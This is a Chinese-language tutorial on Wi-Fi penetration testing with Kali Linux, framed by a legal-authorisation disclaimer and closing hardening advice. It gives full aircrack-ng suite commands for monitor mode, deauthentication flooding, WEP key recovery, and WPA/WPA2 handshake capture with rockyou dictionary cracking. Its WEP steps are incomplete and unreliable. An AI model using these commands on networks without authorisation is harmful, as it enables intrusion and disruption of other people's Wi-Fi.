在校园宿舍、办公园区、咖啡馆等场景中,无线网络的普及让网络连接变得便捷高效,但加密配置不当、弱密码使用、固件漏洞等问题也让无线网络成为网络攻击的重灾区。对于大学生和 IT 从业者来说,掌握无线网络安全测试技能,不仅能应对课程实践、项目需求,更能在求职就业中增添核心竞争力。

Kali Linux 作为渗透测试的专用系统,内置了 aircrack-ng、Wireshark、kismet 等多款专业无线网络测试工具,无需额外复杂配置即可开展实操。本文将从 合法合规 前提出发,以「工具使用 + 步骤拆解 + 实战演示」的方式,带你一步步掌握无线网络安全测试的核心流程,新手也能直接落地操作。

Kali Linux 最新版本获取: https://pan.quark.cn/s/ff58f9f0e064


⚠️ 合法性声明(必读)#

首先必须明确底线:所有测试操作仅能在合法授权范围内进行

你只能对 自己拥有所有权已获得网络所有者书面许可 的无线网络开展测试,严禁未经授权入侵他人网络、窃取数据、干扰网络运行等违法行为,否则可能触犯《网络安全法》《刑法》等法律法规。

这是网络安全从业者最基本的职业操守,也是避免踩坑的关键前提。


一、环境准备#

1️⃣ 硬件要求#

  • 一块 支持监听模式(Monitor Mode) 的无线网卡

  • 内置网卡大多不支持,推荐外置 USB 无线网卡

    • 如:TP-LINK TL-WN722N(v1 / v2)

2️⃣ 系统准备#

  • 安装最新版 Kali Linux
  • 切换至 root 权限:
sudo su

后续所有工具均需 root 权限运行。


二、激活无线网卡监听模式#

监听模式是无线网络测试的基础,可捕获周边所有无线网络的数据包。

操作步骤#

  1. 查看无线网卡名称:
ip addr

常见名称为 wlan0(多网卡时可能是 wlan1)。

  1. 关闭可能干扰监听模式的进程:
airmon-ng check kill
  1. 启动监听模式:
airmon-ng start wlan0

成功后会看到提示:

monitor mode enabled on wlan0mon
  1. 验证监听模式:
iwconfig

wlan0mon 的 Mode 显示为 Monitor,说明激活成功。


三、扫描周边无线网络并收集信息#

核心目标是获取:

  • SSID(网络名称)
  • BSSID(路由器 MAC 地址)
  • CH(信道)
  • ENC(加密方式)

扫描命令#

airodump-ng wlan0mon

关键字段说明#

  • SSID:无线网络名称(隐藏网络显示为空)
  • BSSID:路由器物理地址(核心标识)
  • CH:信道(1–13)
  • ENC:加密方式(WEP / WPA / WPA2 / WPA3)
  • PWR:信号强度(越接近 0 越强)

记录目标网络信息后,按 Ctrl + C 停止扫描。


四、针对不同加密方式的漏洞测试(核心)#

场景 1:WEP 加密网络(安全性极低)#

1. 锁定目标并抓包#

airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wep_test wlan0mon

2. 发送解除认证数据包#

aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF wlan0mon

Data 数值足够大时,会自动显示:

KEY FOUND! [ XXXX-XXXX-XXXX-XXXX ]

说明 WEP 密钥已成功获取。


场景 2:WPA / WPA2 加密网络(主流)#

1. 捕获握手包#

airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wpa_test wlan0mon

2. 强制客户端重连(如已有客户端)#

aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c XX:XX:XX:XX:XX:XX wlan0mon

若看到:

WPA handshake: AA:BB:CC:DD:EE:FF

说明握手包捕获成功。

3. 字典攻击破解#

gunzip /usr/share/wordlists/rockyou.txt.gz
aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa_test-01.cap

弱密码将很快被破解并显示:

KEY FOUND! [ password ]

五、数据包深度分析(Wireshark)#

wireshark

重点分析方向#

  • 明文传输漏洞(HTTP 数据)
  • 重放攻击风险(802.11 Sequence Control)
  • 敏感信息泄露(Beacon 帧中的型号、固件版本)

补充工具:Kismet#

kismet

可探测隐藏 SSID,并还原网络信息。


六、漏洞修复与安全加固建议#

  • 使用 WPA3WPA2-AES 加密
  • 密码 ≥ 12 位,包含大小写字母、数字、符号
  • 关闭 WPS、限制 MAC 地址
  • 定期更新路由器固件
  • 修改默认管理地址和管理员密码
  • 公共 WiFi 下避免访问敏感业务

七、收尾与规范操作#

  • 生成完整测试报告(漏洞、风险、修复建议)
  • 关闭监听模式:
airmon-ng stop wlan0mon
systemctl start NetworkManager

恢复正常网络状态,避免影响日常使用。


本文仅用于 网络安全学习与防御研究,请严格遵守法律与职业道德。